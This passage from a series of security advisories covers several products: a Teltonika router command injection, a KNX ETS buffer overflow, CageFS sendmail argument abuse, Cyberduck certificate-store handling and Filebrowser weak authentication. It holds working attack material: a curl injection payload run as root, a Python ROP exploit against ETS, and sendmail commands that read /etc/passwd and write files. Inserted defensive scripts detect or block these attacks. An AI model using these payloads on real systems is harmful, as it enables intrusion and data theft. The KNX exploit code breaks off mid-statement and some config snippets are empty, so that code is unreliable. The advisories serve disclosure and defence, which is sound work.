    * uamip
    * uamport
    * userurl
* `/cgi-bin/hotspotlogin.cgi`
  * *If* send=1
    * uamip
    * TelNum
    * challenge
    * uamport
    * userurl
  * *If* button=1 or (res=wispr and UserName=1)
    * uamport
    * uamip
  * *If* res=success or res=already or res=popup2
    * uamip
    * uamport
  * *If* res=logoff or res=popup3
    * uamip
    * uamport

The affected scripts use these parameters to build OS commands via
string concatenation without proper sanitization.

The vulnerabilities are located in the source files `hotspotlogin.cgi`
and `landing_page_functions.lua`, which is included from `autologin.cgi`
and `hotspotlogin.cgi`.

The `landing_page_functions.lua` script provides multiple functions,
which are either vulnerable to OS command injection themselves or
propagate insecure usage.

For example, it provides the function `getParam`, which directly passes
the argument to `io.popen`:

```lua
[...]
function getParam(string)
    local h = io.popen(string)
    local t = h:read()
    h:close()
    return t
end
[...]
```

`landing_page_functions.lua` also provides the functions `debug` and
`get_ifname`, which use `os.execute` and `getParam` in an insecure way:

```lua
[...]
function debug(string)
    if debug_enable == 1 then
        os.execute("/usr/bin/logger -t hotspotlogin.cgi \""..string.."\"")
    end
end
[...]
function get_ifname(ip)
    local result = getParam(format("ip addr | grep \"%s\"", ip))
    local tun = string.match(result, "(tun%d+)")
    local ifname = "wlan0"
    [...]
```

For example, `hotspotlogin.cgi` makes use of the functions `get_ifname` and
`getParam`. Occasionally, it also insecurely uses `os.execute` directly:

```lua
[...]
if send and send ~= "" and tel_num then
    local ifname = get_ifname(uamip)
    local pass = generate_code(ifname) or "0000"
    tel_num = tel_num:gsub("%%2B", "+")
    local exists = getParam("grep \"" ..tel_num.. "\" /etc/chilli/" .. ifname .. "/smsusers")
    local user = string.format("%s", pass)
    local uri = os.getenv("REQUEST_URI")
    local message = string.format("%s Password - %s \n Link - http://%s%s?challenge=%s&uamport=%s&uamip=%s&userurl=%s&UserName=%s&button=1", tel_num, pass, uamip, uri, challenge, uamport, uamip, userurl, pass)
    local smsotp_mesg=string.format("%s;%s", tel_num, pass)
    message = getParam(string.format("/usr/sbin/gsmctl -Ss \"%s\"", message))

    if message == "OK" then
        os.execute("echo \""..smsotp_mesg.."\" >> /tmp/smsotp.log")
        sms = "sent"
        if exists then
            os.execute("sed -i 's/" ..exists.. "/" ..user.. "/g' /etc/chilli/" .. ifname .. "/smsusers")
        else
            os.execute("echo \"" ..user.. "\" >>/etc/chilli/" .. ifname .. "/smsusers")
        end
[...]
```

In one of the first lines of the above code snippet, `hotspotlogin.cgi`
calls `get_ifname` with unsanitized user input from the parameter
`uamip`. A few lines later it calls `getParam` with unsanitized user
input from the parameter `TelNum`. In a further call to `getParam` it
uses more unsanitized user input.

There are further locations that call insecure functions like `debug`
and `get_ifname` either directly or indirectly with user input from the
scripts `autologin.cgi` and `hotspotlogin.cgi`.
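Detection logic a defender could run over web-server or proxy logs for the parameters listed above, as an added Python example that is not Teltonika code; the log format and every log line are constructed, and the first line carries the advisory's proof-of-concept payload URL-encoded as a POST body:

```python
"""Access-log detection for the RUT9XX captive-portal command injection.

Added example, not Teltonika code. It flags requests to the two affected
scripts whose injectable parameters (the list from this advisory) carry
shell metacharacters. Because the scripts concatenate the values into
differently quoted shell strings, any quote, backtick, dollar sign,
separator or redirection character is treated as suspicious. The log
format and all log lines are constructed.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Parameters this advisory lists as reaching os.execute / io.popen unsanitized.
AFFECTED = {
    "/cgi-bin/autologin.cgi": {"reply", "uamport", "challenge", "userurl", "res", "reason", "uamip"},
    "/cgi-bin/hotspotlogin.cgi": {"uamip", "TelNum", "challenge", "uamport", "userurl"},
}

# Characters that can terminate or escape the quoted strings the Lua code builds.
SHELL_META = re.compile(r"""["'`$;|&<>\\\n\r]""")

# Constructed log format: <client> "<method> <target> HTTP/x.y" <status> [body="<urlencoded>"]
LOG_RE = re.compile(
    r'^(?P<src>\S+) "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
    r'(?: body="(?P<body>[^"]*)")?$'
)

SAMPLE_LOG = [
    # The advisory's proof-of-concept body, URL-encoded as a proxy would log it.
    '203.0.113.5 "POST /cgi-bin/hotspotlogin.cgi HTTP/1.1" 200 '
    'body="send=1&uamip=%22%3B%20id%20%3E%2Ftmp%2Ftest%20%23"',
    # Benign captive-portal traffic.
    '192.0.2.10 "GET /cgi-bin/autologin.cgi?res=success&uamip=10.0.0.1&uamport=3990 HTTP/1.1" 200',
    # Same parameter name on a path that does not reach the scripts: not reported.
    '192.0.2.12 "GET /index.html?uamip=%22%3B%20id HTTP/1.1" 200',
    # A stray double quote in an injectable parameter is enough to report.
    '198.51.100.7 "GET /cgi-bin/autologin.cgi?res=fail&reason=%22quoted%22 HTTP/1.1" 200',
]


def suspicious_params(target, body=None):
    """Return [(name, decoded_value)] for affected parameters containing metacharacters.
    Query string and (if the log has it) the POST body are both inspected."""
    url = urlsplit(target)
    watched = AFFECTED.get(url.path)
    if watched is None:
        return []
    pairs = parse_qsl(url.query, keep_blank_values=True)
    if body:
        pairs += parse_qsl(body, keep_blank_values=True)
    return [(name, value) for name, value in pairs
            if name in watched and SHELL_META.search(value)]


def scan_log(lines):
    """Run the check over log lines; returns one finding per matching request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = suspicious_params(m["target"], m["body"])
        if hits:
            findings.append({
                "src": m["src"],
                "path": urlsplit(m["target"]).path,
                "params": hits,
            })
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```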

## Proof-of-Concept ##

For example, an attacker can exploit this vulnerability by manipulating
the `uamip` parameter:

```sh
curl -v -o /dev/null "http://$IP/cgi-bin/hotspotlogin.cgi" -d 'send=1&uamip="; id >/tmp/test #'
```

The device executes the commands with root privileges:

```bash
# cat /tmp/test
uid=0(root) gid=0(root)
```

## Timeline ##

* `2018-03-19` identification of vulnerability in version RUT9XX_R_00.04.84
* `2018-04-10` detailed analysis of version RUT9XX_R_00.04.161
* `2018-04-16` re-test of version RUT9XX_R_00.04.172
* `2018-04-16` initial vendor contact through public address
* `2018-04-18` vendor response with security contact
* `2018-04-19` disclosed vulnerability to vendor security contact
* `2018-04-26` vendor released fix in version RUT9XX_R_00.04.233
* `2018-07-09` re-test of version RUT9XX_R_00.05.00.5
* `2018-09-25` request CVE from MITRE
* `2018-09-26` MITRE assigned CVE-2018-17532
* `2018-10-11` public disclosure

## References ##

* Firmware Changelog:

## Credits ##

* David Gnedt ([SBA Research](https://www.sba-research.org/))
--------------------------------------------------------------------------------
/2015/knAx_20150101/README.md:
--------------------------------------------------------------------------------
# Remote code execution vulnerability in the KNX management software ETS #

## Vulnerability Overview ##

* **Identifier** : knAx_20150101
* **Type of Vulnerability** : Buffer overflow vulnerability
* **Software/Product Name** : ETS (Engineering Tool Software)
* **Vendor** : KNX Association
* **Affected Versions** : ETS 4.1.5 (Build 3246)
  : *no other versions tested*
* **Fixed in Version** : *unknown*
* **CVE ID** : CVE-2015-8299
* **Impact** : Critical

## Vulnerability Description ##

The vulnerability is caused by a buffer overflow in a memcpy
operation when parsing specially crafted KNXnet/IP packets in the
Group messages monitor (aka. Falcon). A corresponding proof-of-concept
exploit which was tested on an affected ETS version installed on
Windows XP SP3 can be found below. The proof-of-concept exploit
generates the UDP packet which triggers the vulnerability and should
at least crash the application (it requires Python and Scapy to run).

## Proof-of-Concept ##

Since this is just a PoC, the ROP chain was not carefully selected and
might require adaptation to reproduce the desired results on your system.

`knAx.py`:

```python
#!/usr/bin/env python
""" ETS4 buffer overflow exploit PoC

This is a Proof-of-Concept (PoC) remote exploit of a ETS4 which is
currently running the monitoring software for group messages aka.
"Groupenmonitor". This feature of the ETS4 runs an executable called
"Falcon.exe" which is vulnerable to a buffer overflow.

The vulnerable function gets called at:
    0043C994 call overflow_43C743
This function, which is responsible for the overflow, is located at 0x43c743.
The "memcpy" which produces the overflow gets called at:
    0043C931 call memcpy

Vulnerable version:
    ETS 4.1.5 (Build 3246)
    Stammdaten: Version 57, Schema 1.1
    registry key: "NET Framework Setup"
        v2.0.50727 -version 2.2.30729
        v4 -version 4.0.30319

    ETS4.exe
        LegalCopyright: Copyright \xa9 2010-2012 KNX Association cvba, Brussels, Belgium
        Assembly Version: 4.1.3246.36180
        InternalName: ETS4.exe
        FileVersion: 4.1.3246.36180
        CompanyName: KNX Association cvba
        Comments: ETS4 Application
        ProductName: ETS4
        ProductVersion: 4.1.3246.36180
        FileDescription: ETS4
        OriginalFilename: ETS4.exe

    Falcon.exe
        LegalCopyright: Copyright (C) 2000-2008 KNX Association, Brussels, Belgium
        InternalName: Falcon
        FileVersion: 2.0.5184.4346
        CompanyName: KNX Association
        SpecialBuild: 2011.01.16
        LegalTrademarks: KNX Association
        OLESelfRegister:
        ProductVersion: 2.0
        FileDescription: Falcon
        OriginalFilename: Falcon.ex

Tested on:
    Windows XP SP3 32bit

This exploit uses return-oriented-programming techniques. The gadgets used for ROP are:
    ole32.dll:"0x774fdb5b","33c0c3","0x774fdb5b: xor eax, eax | 0x774fdb5d: ret | "
    ole32.dll:"0x77550f6f","83c064c3","0x77550f6f: add eax, 64h | 0x77550f72: ret | "
    ole32.dll:"0x774ff447","03c4c24e77","0x774ff447: add eax, esp | 0x774ff449: ret 774eh | "
    user32.dll:"0x7e467666","94c3","0x7e467666: xchg esp, eax | 0x7e467667: ret | "

The exploit requires root privileges to send the crafted packet and
the scapy python module!

PoC and vuln. discovery
by aljosha judmayer
"""
from struct import pack,unpack
from scapy.all import *

# --- variables ---
ip_dest = "224.0.23.12"
udp_dport = 3671
udp_sport = 3671
sys_iface = "vboxnet0" # <= CHANGE ME! to external network interface
# ---
knxhdr="\x06\x10\x05\x30\x01\xb2"
knxmsg="\xac\x01\x81\xa9\xe3\xac\xcb\x44\xff\xa2\x67\xcd\x03\x6f\x05\xe4\x58\x19\xae\x65\x1b\x14\x38\x4d\x83\x60\x06"
padding="\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"

def test():
    """ this should terminate the Falcon.exe process """
    exit="\xfa\xca\x81\x7c" # ExitProcess 0x7c81cafa, or 0xffffffff for seg fault

    sendpayload(knxhdr + knxmsg + padding + exit)
    return

def exploit():
    """
    This constructs a ROP payload and sends it.
    Because of stack manipulation after the overflow we need to jump
    over some bytes. Therefore the esp is increased.
    """

    eip = pack("
```

* KNX Association:

## Credits ##

* Aljosha Judmayer ([SBA Research](https://www.sba-research.org/))
--------------------------------------------------------------------------------
/2020/SBA-ADV-20200707-02_CloudLinux_CageFS_Insufficiently_Restricted_Proxy_Commands/README.md:
--------------------------------------------------------------------------------
# CloudLinux CageFS Insufficiently Restricted Proxy Command #

## Vulnerability Overview ##

CloudLinux CageFS 7.0.8-2 or below insufficiently restricts file paths
supplied to the `sendmail` proxy command. This allows local users to read
and write arbitrary files of certain file formats outside the CageFS
environment.

* **Identifier** : SBA-ADV-20200707-02
* **Type of Vulnerability** : External Control of File Name or Path
* **Software/Product Name** : [CloudLinux CageFS](https://www.cloudlinux.com/)
* **Vendor** : CloudLinux Inc.
14 | * **Affected Versions** : <= 7.0.8-2 15 | * **Fixed in Version** : 7.1.1-1 16 | * **CVE ID** : CVE-2020-36772 17 | * **CVSS Vector** : CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L 18 | * **CVSS Base Score** : 6.6 (Medium) 19 | 20 | ## Vendor Description ## 21 | 22 | > CloudLinux OS is the leading platform for multitenancy. It improves 23 | > server stability, density, and security by isolating each tenant and 24 | > giving them allocated server resources. This creates an environment 25 | > that feels more like a virtual server than a shared hosting account. 26 | > By doing so, CloudLinux OS reduces operating costs and churn rates, 27 | > and increases profitability. 28 | 29 | Source: 30 | 31 | ## Impact ## 32 | 33 | A CageFS-restricted local user can read and write arbitrary files of certain 34 | file formats outside the CageFS environment by exploiting the vulnerability 35 | documented in this advisory. 36 | 37 | ## Vulnerability Description ## 38 | 39 | CloudLinux offers a feature called proxy commands in CageFS environments. 40 | It allows limited execution of commands outside the CageFS environment from 41 | a user restricted within the CageFS environment. 42 | 43 | CageFS allows in its default configuration to execute `sendmail` as a proxy 44 | command outside the CageFS environment. This default configuration is 45 | designed to allow local programs sending emails by invoking `sendmail`. 46 | Due to the insufficient validation of sendmail's arguments an attacker can 47 | invoke other sendmail functionality as well. While CageFS applies some 48 | restrictions to the allowed arguments it does not restrict or validate the 49 | `-bi` and `-oA` arguments. 50 | 51 | Therefore, an attacker can have `sendmail` access arbitrary files which will 52 | be interpreted as alias database files by enabling the `newalias` mode of 53 | `sendmail` with `-bi` and specifying a file located outside the CageFS 54 | environment with `-oA`. 
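A proxy-side argument check that would have blocked the `-bi`/`-oA`
combination described above, written as an added Python example; it is not
CageFS code, and the set of permitted options (`-t`, `-i`, `-oi` and `-f`
with an address) is an assumption standing in for whatever the hosted
applications actually need:

```python
import re

# Options a typical web application needs when it pipes mail to sendmail.
# This set is an assumption for the example; a real proxy configuration
# would be derived from the calling applications.
ALLOWED_FLAGS = {"-t", "-i", "-oi"}   # flags that take no value
ALLOWED_VALUE_OPTS = {"-f"}            # options that take exactly one value

# Conservative envelope-sender/recipient syntax: local@domain, small charset.
ADDRESS_RE = re.compile(r"^[A-Za-z0-9._+-]{1,64}@[A-Za-z0-9.-]{1,253}$")


def validate_sendmail_args(argv):
    """Return the sanitized argument list or raise ValueError.

    Everything not explicitly allowed is rejected, so:
    - `-bi` / `-I` (newaliases mode) never pass,
    - `-oA<path>` never passes; the path is glued to the option without a
      separator, so it is matched as "starts with -", not as "-oA",
    - `-vv` and `-v -v` are rejected because `-v` itself is unknown,
    - the value of `-f` must look like an address, and
    - remaining words are recipients, emitted after `--` so a recipient
      beginning with `-` cannot be parsed as an option by sendmail.
    """
    args = list(argv)
    sanitized = []
    recipients = []
    i = 0
    while i < len(args):
        arg = args[i]
        if arg == "--":
            recipients.extend(args[i + 1:])
            break
        if arg in ALLOWED_FLAGS:
            sanitized.append(arg)
            i += 1
            continue
        if arg in ALLOWED_VALUE_OPTS:
            if i + 1 >= len(args):
                raise ValueError(f"{arg} requires a value")
            value = args[i + 1]
            if not ADDRESS_RE.match(value):
                raise ValueError(f"invalid address for {arg}: {value!r}")
            sanitized.extend([arg, value])
            i += 2
            continue
        if arg.startswith("-"):
            # Covers -bi, -I, -oA/etc/passwd, -oA'-s,-f,...', -vv, -fX, ...
            raise ValueError(f"option not allowed: {arg!r}")
        recipients.append(arg)
        i += 1

    for rcpt in recipients:
        if not ADDRESS_RE.match(rcpt):
            raise ValueError(f"invalid recipient: {rcpt!r}")
    return (sanitized + ["--"] + recipients) if recipients else sanitized
```

The check runs outside the cage, before `execve` of the real `sendmail`;
validating inside the cage would leave the caller free to skip it.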

On systems using the Postfix to Sendmail compatibility interface, a great
number of different alias database types can be used to craft exploits.
The compatibility interface internally calls `postalias` and, besides the
`-oA` argument already being dangerous by itself, it also suffers from an
argument injection issue, which allows injection of additional Postfix
specific arguments for `postalias`. However, this is not a security issue
in Postfix.

According to Postfix developers, Postfix's `sendmail` does not enforce a
security policy on command-line arguments. Instead, it relies on the
UNIX/Linux system to enforce access policies based on the effective user and
group IDs of the process. If a security policy should be enforced, the
calling process must sanitize the command-line arguments before they are
given to `sendmail`. This includes but is not limited to sanity checks on
pathnames, and if applicable sanity checks on file contents in a way that
is not vulnerable to time-of-check to time-of-use race attacks, and
disabling options processing with `--`.

## Proof of Concept ##

For example, an attacker can read arbitrary files that at least partially
follow the structure `key value` via the lookup table type
`texthash`:

```sh
$ sendmail -bi -oA'-s,-f,texthash:/etc/passwd'
postalias: warning: /etc/passwd, line 1: expected format: key whitespace value -- ignoring this line
[...]
postalias: warning: /etc/passwd, line 211: expected format: key whitespace value -- ignoring this line
sssd:x:496:493:User: for sssd:/:/sbin/nologin
dbus:x:81:81:System: message bus:/:/sbin/nologin
polkitd:x:497:495:User: for polkitd:/:/sbin/nologin
tss:x:59:59:Account: used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
systemd-resolve:x:193:193:systemd: Resolver:/:/sbin/nologin
rngd:x:494:491:Random: Number Generator Daemon:/var/lib/rngd:/sbin/nologin
sshd:x:74:74:Privilege-separated: SSH:/var/empty/sshd:/sbin/nologin
systemd-coredump:x:499:497:systemd: Core Dumper:/:/sbin/nologin
nobody:x:65534:65534:Kernel: Overflow User:/:/sbin/nologin
ftp:x:14:50:FTP: User:/var/ftp:/sbin/nologin
unbound:x:498:496:Unbound: DNS resolver:/etc/unbound:/sbin/nologin
nrpe:x:492:486:NRPE: user for the NRPE service:/var/run/nrpe:/sbin/nologin
```

The attacker can also use other lookup table types which might disclose
sensitive information. For example, `unix` allows the query of specific
users regardless of the format:

```sh
$ sendmail -bi -oA'-q,ftp2406151,unix:passwd.byname'
ftp2406151:x:935:935::/home/ftp2406151:/sbin/nologin
```

An attacker can also write specific file formats outside the CageFS
environment. For example, with the `hash` lookup table type:

```sh
$ echo sba:was_here | sendmail -bi -oA'-o,-p,-i,-f,hash:/tmp/sba_was_here'
$ sendmail -bi -oA'-s,-f,hash:/tmp/sba_was_here'
@: @
YP_LAST_MODIFIED: 1594138203
YP_MASTER_NAME: localhost
sba: was_here
```

## Recommended Countermeasures ##

We recommend restricting the `sendmail` command to only the strictly required
parameters using an allow list approach. At least the following parameters
are known to cause dangerous behavior:

* `-oA`: Allows specification of multiple paths and additional arguments.
  It is important to consider that it is directly followed by the pathname
  without a separator, i.e., `-oA/etc/passwd`.
* `-bi`: Enables the `newaliases` mode of `sendmail`.
* `-I`: Enables the `newaliases` mode of `sendmail`.
* `-v`: If the parameter is added at least two times, i.e., `-vv`,
  `-vvvvv` or `-v -v`, it enables the verbose mode, which leaks the
  Postfix configuration in some cases.

We did not fully analyze other parameters of `sendmail`; therefore, it is
possible that `sendmail` as a proxy command is also prone to other attacks.

## Timeline ##

* `2020-07-07`: identification of vulnerability in version 7.0.6-1
* `2020-07-10`: initial vendor contact
* `2020-07-13`: initial vendor response
* `2020-07-13`: disclosed vulnerability to vendor security contact
* `2020-08-06`: vendor released version 7.1.1-1 to testing
* `2020-09-03`: vendor released version 7.1.1-1 to production
* `2020-10-02`: request CVE from MITRE
* `2022-01-04`: MITRE declined request as it falls in the scope of Red Hat
* `2024-01-19`: request CVE from Red Hat
* `2024-01-22`: Red Hat assigned CVE-2020-36772
* `2024-01-25`: public disclosure

## References ##

* CageFS 7.1.1-1 beta:
* CageFS 7.1.1-1 production:

## Credits ##

* David Lisa Gnedt ([SBA Research](https://www.sba-research.org/))

-------------------------------------------------------------------------------- /2025/SBA-ADV-20250325-01_Cyberduck_Mountain_Duck_Certificate_Handling/README.md: --------------------------------------------------------------------------------

# Cyberduck and Mountain Duck - Improper Certificate Store Handling #

## Vulnerability Overview ##

Cyberduck and Mountain Duck improperly handle TLS certificate pinning for
untrusted certificates (e.g., self-signed), unnecessarily installing the
certificate into the *Windows Certificate Store* of the current user without
any restrictions. This potentially allows attackers to bypass
certificate-based authentication or authorization of other programs that
trust this certificate store.

* **Identifier** : SBA-ADV-20250325-01
* **Type of Vulnerability** : CWE-266: Incorrect Privilege Assignment
* **Software/Product Name** : [Cyberduck](https://cyberduck.io/) and [Mountain Duck](https://mountainduck.io/)
* **Vendor** : [iterate GmbH](https://iterate.ch/)
* **Affected Versions** : Cyberduck <= 9.1.6 and Mountain Duck <= 4.17.5
* **Fixed in Version** : Cyberduck 9.1.7 and Mountain Duck 4.17.6
* **CVE ID** : CVE-2025-41255
* **GHSA** : GHSA-vjjc-grpp-m655
* **CVSS Vector** : CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N
* **CVSS Base Score** : 8.0 (High)

## Vendor Description ##

> Cyberduck is a libre server and cloud storage browser for Mac and Windows
> with support for FTP, SFTP, WebDAV, Amazon S3, OpenStack Swift, Backblaze
> B2, Microsoft Azure & OneDrive, Google Drive and Dropbox.

Source:

> Mountain Duck lets you mount server and cloud storage as a disk in Finder
> on macOS and the File Explorer on Windows. Open remote files with any
> application and work like on a local volume.

Source:

## Impact ##

Other programs on the system that trust the *Windows Certificate Store* of
the current user can be attacked.
As the intended purpose of the certificate is not restricted, it can be
misused, e.g., to perform server authentication, code signing or
machine-in-the-middle attacks.

## Vulnerability Description ##

When permanently accepting an unknown TLS certificate for a specified
service, Cyberduck and Mountain Duck add the certificate to their own
configuration file and to the `Trusted Root Certification Authorities`
of the *Windows Certificate Store* of the current user, whereby its
`Intended Purposes` is set to `<All>`.
This means that all programs which trust the user's *Windows Certificate
Store* also trust this certificate for all use cases.

## Proof of Concept ##

1. Set up a TLS encrypted *WebDAV* server which uses a self-signed
   certificate (in this case at the IP address `10.42.42.1`).

2. Create a new connection to the server in Cyberduck or Mountain Duck.

3. The following certificate error is shown, since the self-signed
   certificate is not trusted:
   ![Certificate error](./images/Certificate%20Error.png)
   To always trust this certificate for this connection, `Always Trust` must be
   checked before clicking `Continue`.

4. Afterwards the following dialog shows up, asking whether to install
   the certificate:
   ![Security warning](./images/Security%20Warning.png)
   Clicking `No` cancels the connection process; to continue,
   clicking `Yes` is required.

5. Now the certificate is stored within the
   `Trusted Root Certification Authorities` of the *Windows Certificate Store*
   of the current user, whereby its `Intended Purposes` is set to `<All>`:
   ![Windows Certificate Store](./images/Windows%20Certificate%20Store.png)
   The thumbprint of the certificate is also stored in the configuration file
   of the application:

   Cyberduck (`C:\Users\\AppData\Roaming\Cyberduck\Cyberduck.user.config`):

   ```xml
   False

   [...]

   ```

   Mountain Duck (`C:\Users\\AppData\Roaming\Cyberduck\Mountain Duck.user.config`):

   ```xml
   False

   ```

This means that an attacker could, for example, use a phishing attack to
trick a victim into connecting to a server that uses a self-signed
certificate and is under the attacker's control. If the victim permanently
trusts the presented certificate for the specified connection, the
certificate is actually not only pinned for this specific connection,
but it is installed in the `Trusted Root Certification Authorities` of the
*Windows Certificate Store* of the current user, whereby its
`Intended Purposes` is set to `<All>`. This allows other programs on the
victim's system to be attacked.

## Recommended Countermeasures ##

We recommend updating to Cyberduck version 9.1.7 / Mountain Duck version
4.17.6 or later, which applies the following countermeasure.

When permanently accepting a TLS certificate for a specific service, the
application should store the certificate fingerprint only in its own
configuration file rather than installing the certificate in the Windows
Certificate Store.
Since the certificate can be manually removed from the Windows Certificate
Store after installation and the applications then do not display any
certificate errors, it seems that only the application's own configuration
file is used to verify pinned certificates anyway.
Adding the certificate to the *Windows Certificate Store* is therefore
apparently not necessary and only expands the system's attack surface.
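What the per-service pinning described in the countermeasure looks like in
code, as an added Python example that is not the vendor's implementation.
The pin store format, the function names and the two certificate byte
strings are constructed for illustration; a real client would hash the DER
bytes returned by `ssl.SSLSocket.getpeercert(binary_form=True)`:

```python
import hashlib
import json

# Constructed stand-ins for DER-encoded certificates (not real certificates).
SELF_SIGNED_DER = b"\x30\x82\x01\x00" + b"\x01" * 60
ATTACKER_DER = b"\x30\x82\x01\x00" + b"\x02" * 60


def fingerprint(der_bytes):
    """SHA-256 over the DER encoding; the choice of hash is ours here."""
    return hashlib.sha256(der_bytes).hexdigest()


class PinStore:
    """Certificate pins scoped to (host, port), kept in application state.

    Nothing here touches a system trust store: accepting a certificate for
    one WebDAV server changes what this program trusts for that server only,
    not what other programs, or this program talking to another host, trust.
    """

    def __init__(self):
        self._pins = {}  # (host, port) -> fingerprint

    def pin(self, host, port, der_bytes):
        self._pins[(host.lower(), port)] = fingerprint(der_bytes)

    def is_pinned(self, host, port, der_bytes):
        return self._pins.get((host.lower(), port)) == fingerprint(der_bytes)

    def dumps(self):
        """Serialize for the application's own config file (the analogue of
        the thumbprint entries in Cyberduck.user.config)."""
        return json.dumps({f"{h}:{p}": fp for (h, p), fp in self._pins.items()},
                          sort_keys=True)

    @classmethod
    def loads(cls, text):
        store = cls()
        for key, fp in json.loads(text).items():
            host, _, port = key.rpartition(":")  # rpartition keeps IPv6 hosts intact
            store._pins[(host, int(port))] = fp
        return store


def decide(store, host, port, der_bytes, chain_valid):
    """Trust decision after the handshake.

    chain_valid is the result of ordinary PKI validation against the system
    store, which pinning leaves untouched. A pin only rescues the exact
    certificate for the exact service the user accepted it for.
    """
    if chain_valid:
        return "trusted: valid chain"
    if store.is_pinned(host, port, der_bytes):
        return "trusted: pinned for this service"
    return "untrusted: prompt the user"
```

The same certificate presented by a different host, or on a different port
of the pinned host, falls through to the prompt, which is the behaviour the
`Always Trust` checkbox suggests to the user.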

## Timeline ##

* `2025-03-25` Identified the vulnerability in Cyberduck version 9.1.3
  and Mountain Duck version 4.17.3
* `2025-03-27` Initial contact attempt and disclosure of vulnerability to
  iterate GmbH via GitHub Security Advisory
* `2025-04-09` Vendor accepted this report
* `2025-06-20` Vendor created a private fork to address the problem
* `2025-06-23` Vendor merged the patch to main
* `2025-06-24` Vendor released Cyberduck 9.1.7 / Mountain Duck 4.17.6
* `2025-06-24` Public disclosure via GHSA
* `2025-06-25` SBA Research assigned CVE-2025-41255
* `2025-06-25` Public disclosure via CVE

## References ##

* GitHub Security Advisory. Cyberduck and Mountain Duck - Improper Certificate Store Handling:

## Credits ##

* Andreas Boll ([SBA Research](https://www.sba-research.org/))
* Thomas Kostal ([SBA Research](https://www.sba-research.org/))

-------------------------------------------------------------------------------- /2025/SBA-ADV-20250327-01_Filebrowser_Insecure_Password_Handling/README.md: --------------------------------------------------------------------------------

# Filebrowser Insecure Password Handling #

## Vulnerability Overview ##

All user accounts authenticate towards a Filebrowser instance with a
password. A missing password policy and missing brute-force protection make
it impossible for administrators to properly secure the authentication
process.

* **Identifier** : SBA-ADV-20250327-01
* **Type of Vulnerability** : Weak Authentication
* **Software/Product Name** : [Filebrowser](https://filebrowser.org/)
* **Vendor** : [Filebrowser](https://github.com/filebrowser)
* **Affected Versions** : <= 2.34.0
* **Fixed in Version** : 2.34.1
* **CVE ID** : CVE-2025-52997
* **CVSS Vector** : CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
* **CVSS Base Score** : 5.9 (Medium)

## Vendor Description ##

> filebrowser provides a file managing interface within a specified directory
> and it can be used to upload, delete, preview, rename and edit your files.
> It allows the creation of multiple users and each user can have its own
> directory. It can be used as a standalone app.

Source:

## Impact ##

Attackers can mount a brute-force attack against the passwords of all
accounts of an instance. Since the application lacks the ability to
prevent users from choosing a weak password, the attack is likely to succeed.

## Vulnerability Description ##

The application implements a classical authentication scheme using a username
and password combination. While employed by many systems, this scheme is
quite error-prone and a common cause of vulnerabilities. Filebrowser's
implementation has multiple weak points:

1. Since the application is missing the capability for administrators to
   define a password policy, users are at liberty to set trivial and
   well-known passwords such as `secret`, or even ones consisting of a single
   digit such as `1`.
2. New instances are set up with a default password of `admin` for the
   initial administrative account. This password is well known and easily
   guessable. While the documentation advises changing this password, the
   application does not technically enforce it.
3. The application does not implement any brute-force protection for the
   authentication endpoint. Attackers can make as many guesses for a password
   as the network bandwidth allows.

The combination of these problems makes it likely that an attacker will
succeed in compromising at least one account in a Filebrowser instance,
possibly even one with administrative privileges. The likelihood of such an
attack increases substantially for internet-facing instances.

## Proof of Concept ##

The insecure default credentials are documented on the application's website:

![Documentation for the default credentials](images/filebrowser_documentation_admincredentials.png)

The following HTTP communication shows that a trivial password of `1` can be
configured by a user:

```http hl:11
PUT /api/users/2 HTTP/1.1
Host: filebrowser.local:8080
Referer: http://filebrowser.local:8080/settings/profile
X-Auth: eyJ[...]
Content-Type: text/plain;charset=UTF-8
Content-Length: 319
Origin: http://filebrowser.local:8080
Cookie: auth=eyJ[...]
[...]

{"what":"user","which":["password"],"data":{"id":2,"locale":"en","viewMode":"mosaic","singleClick":false,"perm":{"admin":false,"execute":true,"create":true,"rename":true,"modify":true,"delete":true,"share":true,"download":true},"commands":[],"lockPassword":false,"hideDotfiles":false,"dateFormat":false,"password":"1"}}

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Security-Policy: default-src 'self'; style-src 'unsafe-inline';
Content-Type: text/plain; charset=utf-8
X-Content-Type-Options: nosniff
Date: Thu, 27 Mar 2025 08:31:34 GMT
Content-Length: 7

200 OK
```

The missing brute-force protection can easily be tested by repeatedly sending
the following request to the application with a tool such as Burp or hydra.

```http
POST /api/login HTTP/1.1
Host: filebrowser.local:8080
Content-Type: application/json
Content-Length: 52
Origin: http://filebrowser.local:8080
[...]

{"username":"admin","password":"myPasswordGuess","recaptcha":""}

HTTP/1.1 403 Forbidden
Cache-Control: no-cache, no-store, must-revalidate
Content-Security-Policy: default-src 'self'; style-src 'unsafe-inline';
Content-Type: text/plain; charset=utf-8
X-Content-Type-Options: nosniff
Date: Thu, 27 Mar 2025 08:39:48 GMT
Content-Length: 14

403 Forbidden
```

After sending 3000 bad passwords to the application within a few seconds, a
successful authentication is still possible for the account:

```http
POST /api/login HTTP/1.1
Host: filebrowser.local:8080
Content-Type: application/json
Content-Length: 54
Origin: http://filebrowser.local:8080
[...]

{"username":"admin","password":"myCorrectPassword","recaptcha":""}

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Security-Policy: default-src 'self'; style-src 'unsafe-inline';
Content-Type: text/plain
Date: Thu, 27 Mar 2025 08:39:58 GMT
Content-Length: 508

eyJ[...]
```

## Recommended Countermeasures ##

The application should add an option to define a password policy in its
administrative interface which allows setting a minimum length for passwords.
The default settings should be in line with the NIST publication SP 800-63B.
This means that passwords of fewer than 8 characters should never be
allowed by the application. Whenever a user sets a new password, the
application should verify whether that password is part of a "known
passwords" list.
